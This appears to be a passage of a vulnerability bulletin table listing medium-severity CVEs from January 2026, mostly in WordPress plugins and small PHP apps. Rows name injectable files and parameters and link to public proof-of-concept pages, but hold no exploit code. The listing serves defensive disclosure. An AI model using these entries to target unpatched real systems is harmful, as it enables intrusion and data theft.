| code-projects--Online Product Reservation System | A weakness has been identified in code-projects Online Product Reservation System 1.0. This issue affects some unknown processing of the file app/products/left_cart.php. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. | 2026-01-05 | 6.3 | CVE-2026-0584 | VDB-339476; code-projects Online Product Reservation System left_cart.php sql injection VDB-339476; CTI Indicators (IOB, IOC, TTP, IOA) Submit #731095; code-projects Online Product Reservation system in PHP with source code V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_left_cart.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_left_cart.php.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A vulnerability was determined in code-projects Online Product Reservation System 1.0. The affected element is an unknown function of the file /app/checkout/delete.php of the component POST Parameter Handler. This manipulation of the argument ID causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2026-01-05 | 6.3 | CVE-2026-0590 | VDB-339500; code-projects Online Product Reservation System POST Parameter delete.php sql injection VDB-339500; CTI Indicators (IOB, IOC, TTP, IOA) Submit #731128; code-projects Online Product Reservation System V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_checkout_delete.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_checkout_delete.php.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A vulnerability was identified in code-projects Online Product Reservation System 1.0. The impacted element is an unknown function of the file /app/checkout/update.php of the component Cart Update Handler. Such manipulation of the argument id/qty leads to sql injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2026-01-05 | 6.3 | CVE-2026-0591 | VDB-339501; code-projects Online Product Reservation System Cart Update update.php sql injection VDB-339501; CTI Indicators (IOB, IOC, TTP, IOA) Submit #731129; code-projects Online Product Reservation System V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_checkout_update.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_checkout_update.php.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A vulnerability was detected in code-projects Online Product Reservation System 1.0. The affected element is an unknown function of the file handgunner-administrator/prod.php. Performing a manipulation of the argument cat results in cross site scripting. The attack can be carried out remotely. The exploit is now public and may be used. | 2026-01-05 | 4.3 | CVE-2026-0586 | VDB-339478; code-projects Online Product Reservation System prod.php cross site scripting VDB-339478; CTI Indicators (IOB, IOC, TTP, IOA) Submit #731098; code-projects Online Product Reservation system in PHP with source code V1.0 Improper Neutralization of Alternate XSS Syntax https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/xss_prod.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/xss_prod.php.md#poc https://code-projects.org/ |
| codeclouds--Unify | The Unify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'init' action in all versions up to, and including, 3.4.9. This makes it possible for unauthenticated attackers to delete specific plugin options via the 'unify_plugin_downgrade' parameter. | 2026-01-07 | 5.3 | CVE-2025-13529 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b5fd4a47-0549-4d03-b81a-ad97d3d5d390?source=cve https://plugins.trac.wordpress.org/browser/unify/trunk/Services/Hooks.php#L154 https://plugins.trac.wordpress.org/browser/unify/tags/3.4.9/Services/Hooks.php#L154 |
| Columbia Weather Systems--MicroServer | MicroServer copies parts of the system firmware to an unencrypted external SD card on boot, which contains user and vendor secrets. An attacker can utilize these plaintext secrets to modify the vendor firmware, or gain admin access to the web portal. | 2026-01-07 | 6.5 | CVE-2025-64305 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-006-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-006-01.json |
| coreshop--CoreShop | CoreShop is a Pimcore enhanced eCommerce solution. Prior to version 4.1.8, a blind SQL injection vulnerability exists in the application that allows an authenticated administrator-level user to extract database contents using boolean-based or time-based techniques. The database account used by the application is read-only and non-DBA, limiting impact to confidential data disclosure only. No data modification or service disruption is possible. This issue has been patched in version 4.1.8. | 2026-01-08 | 4.9 | CVE-2026-22242 | https://github.com/coreshop/CoreShop/security/advisories/GHSA-ch7p-mpv4-4vg4 https://github.com/coreshop/CoreShop/commit/59e84fec59d113952b6d28a9b30c6317f9e6e5dd |
| corsonr--Easy GitHub Gist Shortcodes | The Easy GitHub Gist Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter of the gist shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14147 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b117d77b-2c11-451c-b236-b55e8af68a9a?source=cve https://plugins.trac.wordpress.org/browser/easy-github-gist-shortcodes/trunk/easy-github-gist-shortcodes.php#L24 https://plugins.trac.wordpress.org/browser/easy-github-gist-shortcodes/tags/1.0/easy-github-gist-shortcodes.php#L24 |
| creativemotion--Clearfy Cache WordPress optimization plugin, Minify HTML, CSS & JS, Defer | The Clearfy Cache - WordPress optimization plugin, Minify HTML, CSS & JS, Defer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.4.0. This is due to missing nonce validation on the "wbcr_upm_change_flag" function. This makes it possible for unauthenticated attackers to disable plugin/theme update notifications via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-09 | 4.3 | CVE-2025-13749 | https://www.wordfence.com/threat-intel/vulnerabilities/id/55750dcf-c6ec-4be6-967f-60bf940fa30e?source=cve https://research.cleantalk.org/cve-2025-13749/ https://plugins.trac.wordpress.org/changeset/3421009/clearfy |
| Crocoblock--JetEngine | Missing Authorization vulnerability in Crocoblock JetEngine allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects JetEngine: from n/a through 3.8.1.1. | 2026-01-07 | 4.3 | CVE-2025-69333 | https://patchstack.com/database/wordpress/plugin/jet-engine/vulnerability/wordpress-jetengine-plugin-3-8-1-1-broken-access-control-vulnerability?_s_id=cve |
| croixhaug--Appointment Booking Calendar Simply Schedule Appointments Booking Plugin | The Appointment Booking Calendar - Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.9.5 via the hash() function due to use of a hardcoded fall-back salt. This makes it possible for unauthenticated attackers to generate a valid token across sites running the plugin that have not manually set a salt in the wp-config.php file and access booking information that will allow them to make modifications. | 2026-01-06 | 6.5 | CVE-2025-11723 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a5f3fbd2-6152-4a89-8fe9-982120d1a640?source=cve https://plugins.trac.wordpress.org/changeset/3393919/ |
| ctietze--PullQuote | The PullQuote plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pullquote' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13903 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0a0ee752-7fc4-46d3-9e0f-8b9317b0ea72?source=cve https://plugins.trac.wordpress.org/browser/pullquote/trunk/includes/core.php#L12 https://plugins.trac.wordpress.org/browser/pullquote/tags/1.0/includes/core.php#L12 |
| cuvixsystem--Post Like Dislike | The Post Like Dislike plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-07 | 6.1 | CVE-2025-14130 | https://www.wordfence.com/threat-intel/vulnerabilities/id/598529d2-16c7-4bbd-9321-aa338c94eb36?source=cve https://plugins.trac.wordpress.org/browser/post-like-dislike/trunk/post-like-dislike.php#L106 https://plugins.trac.wordpress.org/browser/post-like-dislike/tags/1.0/post-like-dislike.php#L106 |
| cyberlord92--miniOrange OTP Verification and SMS Notification for WooCommerce | The miniOrange OTP Verification and SMS Notification for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `enable_wc_sms_notification` AJAX action in all versions up to, and including, 4.3.8. This makes it possible for unauthenticated attackers to enable or disable SMS notification settings for WooCommerce orders. | 2026-01-10 | 5.3 | CVE-2025-14948 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f84ddc83-2079-45b9-8354-51094581b1f8?source=cve https://plugins.trac.wordpress.org/browser/miniorange-sms-order-notification-otp-verification/tags/4.3.8/notifications/wcsmsnotification/handler/class-woocommercenotifications.php#L138 https://plugins.trac.wordpress.org/browser/miniorange-sms-order-notification-otp-verification?rev=3423647 |
| D-Link--DI-8200G | A vulnerability was found in D-Link DI-8200G 17.12.20A1. This affects an unknown function of the file /upgrade_filter.asp. The manipulation of the argument path results in command injection. The attack may be performed remotely. The exploit has been made public and could be used. | 2026-01-08 | 6.3 | CVE-2026-0732 | VDB-340129; D-Link DI-8200G upgrade_filter.asp command injection VDB-340129; CTI Indicators (IOB, IOC, TTP, IOA) Submit #733275; D-Link DI_8200G Router V17.12.20A1 Command Execution https://github.com/DavCloudz/cve/blob/main/D-link/DI_8200G/DI_8200G%20V17.12.20A1%20Command%20Execution%20Vulnerability/readme.md https://github.com/DavCloudz/cve/blob/main/D-link/DI_8200G/DI_8200G%20V17.12.20A1%20Command%20Execution%20Vulnerability/readme.md#poc https://www.dlink.com/ |
| damienoh--WP Widget Changer | The WP Widget Changer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-07 | 6.1 | CVE-2025-14131 | https://www.wordfence.com/threat-intel/vulnerabilities/id/699392b4-8270-47b5-90c1-5280d1389586?source=cve https://wordpress.org/plugins/wp-widget-changer/ https://plugins.trac.wordpress.org/browser/wp-widget-changer/trunk/widget_changer.php#L162 https://plugins.trac.wordpress.org/browser/wp-widget-changer/tags/1.2.5/widget_changer.php#L162 |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. Version 0.8.1-rc2 does not enforce proper access control when querying agent permissions. An authenticated attacker can read the permissions of arbitrary agents, even if they have no permissions for this agent. LibreChat allows the configuration of agents that have a predefined set of instructions and context. Private agents are not visible to other users. However, if an attacker knows the agent ID, they can read the permissions of the agent including the permissions individually assigned to other users. This issue is fixed in version 0.8.2-rc2. | 2026-01-07 | 4.3 | CVE-2025-69221 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-5ccx-4r3h-9qc7 https://github.com/danny-avila/LibreChat/commit/06ba025bd95574c815ac6968454be7d3b024391c https://github.com/danny-avila/LibreChat/releases/tag/v0.8.2-rc2 |
| davidangel--PhotoFade | The PhotoFade plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'time' parameter in all versions up to, and including, 0.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13847 | https://www.wordfence.com/threat-intel/vulnerabilities/id/00145a6b-26fd-4cba-a446-8236438075d8?source=cve https://plugins.trac.wordpress.org/browser/photofade/trunk/photo-fade.php#L96 https://plugins.trac.wordpress.org/browser/photofade/tags/0.2.1/photo-fade.php#L96 |
| debtcom--Debt.com Business in a Box | The Debt.com Business in a Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'configuration' parameter of the lead_form shortcode in all versions up to, and including, 4.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13852 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1bb58556-29be-4272-85fc-bb2b7c72abf4?source=cve https://plugins.trac.wordpress.org/browser/debtcom-business-in-a-box/trunk/inc/bib_form.php#L256 https://plugins.trac.wordpress.org/browser/debtcom-business-in-a-box/tags/4.1.0/inc/bib_form.php#L256 |
| Dell--PowerProtect Data Domain with Data Domain Operating System (DD OS) Feature Release | Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, LTS2023 release versions 7.10.1.0 through 7.10.1.70, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to command execution. | 2026-01-09 | 6 | CVE-2025-46644 | https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| Dell--PowerProtect Data Domain with Data Domain Operating System (DD OS) Feature Release | Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, LTS2023 release versions 7.10.1.0 through 7.10.1.70, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to command execution. | 2026-01-09 | 6.5 | CVE-2025-46645 | https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| Dell--Secure Connect Gateway (SCG) Appliance | Dell Secure Connect Gateway (SCG) 5.0 Appliance and Application, versions 5.26 to 5.30, contain an Execution with Unnecessary Privileges vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges. | 2026-01-06 | 6.4 | CVE-2025-46696 | https://www.dell.com/support/kbdoc/en-us/000385230/dsa-2025-390-dell-secure-connect-gateway-security-update-for-multiple-vulnerabilities |
| directus--directus | Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.14.0, an open redirect vulnerability exists in the Directus SAML authentication callback endpoint. During SAML authentication, the `RelayState` parameter is intended to preserve the user's original destination. However, while the login initiation flow validates redirect targets against allowed domains, this validation is not applied to the callback endpoint. This allows an attacker to craft a malicious authentication request that redirects users to an arbitrary external URL upon completion. The vulnerability is present in both the success and error handling paths of the callback. This vulnerability can be exploited without authentication. Version 11.14.0 contains a patch. | 2026-01-08 | 4.3 | CVE-2026-22032 | https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc https://github.com/directus/directus/commit/dad9576ea9362905cc4de8028d3877caff36dc23 |
| djrowling--Niche Hero \| Beautifully-designed blocks in seconds | The Niche Hero \| Beautifully-designed blocks in seconds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'spacing' parameter of the nh_row shortcode in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14145 | https://www.wordfence.com/threat-intel/vulnerabilities/id/52368b7d-5fe2-444c-bd7f-e4385dffa8a9?source=cve https://plugins.trac.wordpress.org/browser/niche-hero/trunk/niche-hero.php#L302 https://plugins.trac.wordpress.org/browser/niche-hero/tags/1.0.5/niche-hero.php#L302 |
| Dokan--Dokan Pro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dokan Dokan Pro allows Stored XSS. This issue affects Dokan Pro: from n/a through 3.14.5. | 2026-01-05 | 6.5 | CVE-2025-39497 | https://vdp.patchstack.com/database/wordpress/plugin/dokan-pro/vulnerability/wordpress-dokan-pro-plugin-3-14-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| enartia--Piraeus Bank WooCommerce Payment Gateway | The Piraeus Bank WooCommerce Payment Gateway plugin for WordPress is vulnerable to unauthorized order status modification in all versions up to, and including, 3.1.4. This is due to missing authorization checks on the payment callback endpoint handler when processing the 'fail' callback from the payment gateway. This makes it possible for unauthenticated attackers to change any order's status to 'failed' via the publicly accessible WooCommerce API endpoint by providing only the order ID (MerchantReference parameter), which can be easily enumerated as order IDs are sequential integers. This can cause significant business disruption including canceled shipments, inventory issues, and loss of revenue. | 2026-01-07 | 5.3 | CVE-2025-14460 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d7b15198-8f44-4390-862b-35d41eb8a854?source=cve https://plugins.trac.wordpress.org/browser/woo-payment-gateway-for-piraeus-bank/trunk/classes/WC_Piraeusbank_Gateway.php#L821 https://plugins.trac.wordpress.org/browser/woo-payment-gateway-for-piraeus-bank/tags/3.1.4/classes/WC_Piraeusbank_Gateway.php#L821 |
| EngoTheme--Plant - Gardening & Houseplants WordPress Theme | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in EngoTheme Plant - Gardening & Houseplants WordPress Theme allows Retrieve Embedded Sensitive Data. This issue affects Plant - Gardening & Houseplants WordPress Theme: from n/a through 1.0.0. | 2026-01-06 | 5.3 | CVE-2025-31051 | https://patchstack.com/database/wordpress/theme/plant/vulnerability/wordpress-plant-gardening-houseplants-wordpress-theme-1-0-0-sensitive-data-exposure-vulnerability?_s_id=cve |
| expresstech--Quiz and Survey Master (QSM) Easy Quiz and Survey Maker | The Quiz and Survey Master (QSM) - Easy Quiz and Survey Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'is_linking' parameter in all versions up to, and including, 10.3.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-06 | 6.5 | CVE-2025-9318 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e6524e66-5bd1-4616-8185-c0501a09893e?source=cve https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.2.6/php/rest-api.php#L533 |
| expresstech--Quiz and Survey Master (QSM) Easy Quiz and Survey Maker | The Quiz and Survey Master (QSM) - Easy Quiz and Survey Maker plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability and status checks on multiple functions in all versions up to, and including, 10.3.1. This makes it possible for unauthenticated attackers to view the details of unpublished, private, or password-protected quizzes, as well as submit file responses to questions from those quizzes, which allow file upload. | 2026-01-06 | 6.5 | CVE-2025-9637 | https://www.wordfence.com/threat-intel/vulnerabilities/id/88a9abf4-62a9-4695-87e7-18ff0b0075e9?source=cve https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.2.6/php/classes/class-qmn-quiz-manager.php#L281 https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.2.6/php/classes/class-qmn-quiz-manager.php#L1987 https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.2.6/php/rest-api.php |
| expresstech--Quiz and Survey Master (QSM) Easy Quiz and Survey Maker | The Quiz and Survey Master (QSM) - Easy Quiz and Survey Maker plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the qsm_dashboard_delete_result function in all versions up to, and including, 10.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete quiz results. | 2026-01-06 | 4.3 | CVE-2025-9294 | https://www.wordfence.com/threat-intel/vulnerabilities/id/55895508-d0ef-4855-8d15-b8a45ba0dcb2?source=cve https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.2.6/php/admin/options-page-questions-tab.php#L1116 |
| FLIR Systems, Inc.--FLIR Thermal Camera F/FC/PT/D | FLIR Thermal Camera F/FC/PT/D firmware version 8.0.0.64 contains an information disclosure vulnerability that allows unauthenticated attackers to read arbitrary files through unverified input parameters. Attackers can exploit the /var/www/data/controllers/api/xml.php readFile() function to access local system files without authentication. | 2026-01-07 | 6.2 | CVE-2017-20212 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 42786 Packet Storm Security Exploit Archive CXSecurity Vulnerability Listing Archived FLIR Security Advisory |
| Flycatcher Toys--smART Sketcher | A flaw has been found in Flycatcher Toys smART Sketcher up to 2.0. It affects an unknown part of the Bluetooth Low Energy Interface component. Manipulation of this interface results in missing authentication for a critical function. The attack can only be carried out within the local network. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-11 | 6.3 | CVE-2026-0842 | VDB-340442 \| Flycatcher Toys smART Sketcher Bluetooth Low Energy missing authentication VDB-340442 \| CTI Indicators (IOB, IOC) Submit #729134 \| Flycatcher Toys smART Sketcher 2.0 0/1/2 Missing Authentication for Critical Function https://github.com/davidrxchester/smart-sketcher-upload/blob/main/smartsketch-upload.py |
| fpcorso--Testimonial Master | The Testimonial Master plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 0.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-07 | 6.1 | CVE-2025-14127 | https://www.wordfence.com/threat-intel/vulnerabilities/id/15e65a86-db8e-4a4a-b9c6-c688021a514f?source=cve https://wordpress.org/plugins/testimonial-master/ https://plugins.trac.wordpress.org/browser/testimonial-master/trunk/php/tm_help_page.php#L190 https://plugins.trac.wordpress.org/browser/testimonial-master/tags/0.2.1/php/tm_help_page.php#L190 |
| fulippo--WP Status Notifier | The WP Status Notifier plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update the plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-13521 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fbffc404-9ea9-4025-8241-2c374b760ca3?source=cve https://plugins.trac.wordpress.org/browser/wp-change-status-notifier/trunk/options-page.php#L2 https://plugins.trac.wordpress.org/browser/wp-change-status-notifier/tags/1.0/options-page.php#L2 |
| furqan-khanzada--Menu Card | The Menu Card plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `category` parameter in all versions up to, and including, 0.8.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13862 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cec428cd-0fa1-4bc4-b7f6-faf90c31f306?source=cve https://plugins.trac.wordpress.org/browser/menu-card/trunk/menu-card.php#L102 https://plugins.trac.wordpress.org/browser/menu-card/tags/0.8.0/menu-card.php#L102 |
| galdub--Folders Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager | The Folders - Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager plugin for WordPress is vulnerable to Unauthorized Arbitrary Media Replacement in all versions up to, and including, 3.1.5. This is due to missing object-level authorization checks in the handle_folders_file_upload() function. This makes it possible for authenticated attackers, with Author-level access and above, to replace arbitrary media files from the WordPress Media Library. | 2026-01-08 | 4.3 | CVE-2025-12640 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ac6432a4-6597-4d1e-b63d-c007a301d1b2?source=cve https://plugins.trac.wordpress.org/changeset/3402986/folders/tags/3.1.6/includes/media.replace.php |
| ghera74--ilGhera Support System for WooCommerce | The ilGhera Support System for WooCommerce plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the 'delete_single_ticket_callback' and 'change_ticket_status_callback' functions in all versions up to, and including, 1.2.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary support tickets and modify their status. | 2026-01-06 | 5.3 | CVE-2025-14034 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e74fb552-3ef4-47cd-8fe6-8cc1e74b8377?source=cve https://plugins.trac.wordpress.org/browser/wc-support-system/trunk/includes/class-wc-support-system.php#L1331 https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.2.6/includes/class-wc-support-system.php#L1331 https://plugins.trac.wordpress.org/browser/wc-support-system/trunk/includes/class-wc-support-system.php#L865 https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.2.6/includes/class-wc-support-system.php#L865 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3426161%40wc-support-system&new=3426161%40wc-support-system&sfp_email=&sfph_mail= |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 8.3 before 18.5.5, 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an authenticated user to create a denial of service condition by providing crafted responses to external API calls. | 2026-01-09 | 6.5 | CVE-2025-10569 | GitLab Issue #570528 HackerOne Bug Bounty Report #3284689 https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 18.5 before 18.5.5, 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an authenticated user to modify instance-wide AI feature provider settings by exploiting missing authorization checks in GraphQL mutations. | 2026-01-09 | 6.5 | CVE-2025-13781 | GitLab Issue #578756 HackerOne Bug Bounty Report #3400940 https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.4 before 18.5.5, 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an authenticated user with specific permissions to remove all project runners from unrelated projects by manipulating GraphQL runner associations. | 2026-01-09 | 5.4 | CVE-2025-11246 | GitLab Issue #573728 HackerOne Bug Bounty Report #3292475 https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/ |
| glenwpcoder--Drag and Drop Multiple File Upload for Contact Form 7 | The Drag and Drop Multiple File Upload - Contact Form 7 plugin for WordPress is vulnerable to limited upload of files with a dangerous type in all versions up to, and including, 1.3.9.2. This is due to the plugin not blocking .phar and .svg files. This makes it possible for unauthenticated attackers to upload arbitrary .phar or .svg files containing malicious PHP or JavaScript code. Malicious PHP code can be used to achieve remote code execution on the server via direct file access, if the server is configured to execute .phar files as PHP. The upload of .svg files allows for Stored Cross-Site Scripting under certain circumstances. | 2026-01-07 | 6.1 | CVE-2025-14842 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c78a0325-5bbf-4550-8477-94247f085e40?source=cve https://plugins.trac.wordpress.org/browser/drag-and-drop-multiple-file-upload-contact-form-7/trunk/inc/dnd-upload-cf7.php#L1116 https://plugins.trac.wordpress.org/browser/drag-and-drop-multiple-file-upload-contact-form-7/trunk/inc/dnd-upload-cf7.php#L108 https://plugins.trac.wordpress.org/browser/contact-form-7/trunk/includes/formatting.php#L310 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3428236%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&old=3415946%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&sfp_email=&sfph_mail= |
| greenshady--Entry Views | The Entry Views plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'entry-views' shortcode in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13729 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0e7e9fcc-804a-46a8-95cd-b358ba7681ec?source=cve https://plugins.trac.wordpress.org/browser/entry-views/tags/1.0.0/inc/shortcodes.php#L25 https://plugins.trac.wordpress.org/browser/entry-views/tags/1.0.0/inc/shortcodes.php#L36 https://plugins.trac.wordpress.org/browser/entry-views/tags/1.0.0/inc/template.php#L35 |
| Guangzhou V--V-SOL GPON/EPON OLT Platform | V-SOL GPON/EPON OLT Platform v2.03 contains multiple reflected cross-site scripting vulnerabilities due to improper input sanitization in various script parameters. Attackers can exploit these vulnerabilities by injecting malicious HTML and script code to execute arbitrary scripts in a victim's browser session. | 2026-01-07 | 6.1 | CVE-2019-25284 | Zero Science Lab Vulnerability Advisory Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Database VSOL Vendor Homepage |
| guchengwuyue--yshopmall | A vulnerability was found in guchengwuyue yshopmall up to 1.9.1. Affected is the function getPage of the file /api/jobs. Manipulation of the argument sort causes SQL injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-09 | 6.3 | CVE-2025-15496 | VDB-340274 \| guchengwuyue yshopmall jobs getPage sql injection VDB-340274 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #726464 \| https://github.com/guchengwuyue/yshopmall yshopmall V1.9.1 SQL Injection https://github.com/guchengwuyue/yshopmall/issues/39 https://github.com/guchengwuyue/yshopmall/issues/39#issue-3769727898 |
| Hakob--Re Gallery & Responsive Photo Gallery Plugin | Missing Authorization vulnerability in Hakob Re Gallery & Responsive Photo Gallery Plugin allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Re Gallery & Responsive Photo Gallery Plugin: from n/a through 1.17.18. | 2026-01-08 | 5.3 | CVE-2026-22486 | https://patchstack.com/database/wordpress/plugin/regallery/vulnerability/wordpress-re-gallery-responsive-photo-gallery-plugin-plugin-1-17-17-broken-access-control-vulnerability?_s_id=cve |
